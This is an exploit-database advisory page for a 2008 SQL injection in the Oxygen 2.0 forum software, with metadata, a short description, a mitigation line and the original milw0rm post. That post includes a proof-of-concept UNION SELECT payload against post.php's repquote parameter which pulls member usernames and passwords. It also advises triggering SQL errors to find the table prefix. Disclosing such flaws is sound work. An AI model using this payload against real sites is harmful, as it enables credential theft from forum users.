Oxygen 2.0 SQL Injection Vulnerability

vendor:

Oxygen

by:

h0yt3r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Oxygen

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Oxygen 2.0 SQL Injection Vulnerability

This Board Software suffers from a not correctly verified quote ID variable which is used in SQL Querys. An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. We need a valid topic ID. Im not bored enough to code an exploit for this, so do it manually. Its by the way easy to find the correct prefix for the tables by producing a SQL Error. When injected your Query you can find the output in the Subject Text Box.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

######################
#
#Oxygen 2.0 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#This Board Software suffers from a not correctly verified quote ID variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#We need a valid topic ID.
#Im not bored enough to code an exploit for this, so do it manually.
#Its by the way easy to find the correct prefix for the tables by producing a SQL Error.
#When injected your Query you can find the output in the Subject Text Box.
#
#SQL Injection:
#http://[target]/[path]/post.php?action=reply&tid=2517&repquote=[Sequel]
#
#PoC:
#post.php?action=reply&tid=2517&repquote=-1'%20union%20select%20concat(username,0x3a,password),2,3,4,5,6%20from%20o2_members--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the (...) h4ck-y0u Team!
#
#######################
####################### 

# milw0rm.com [2008-06-15]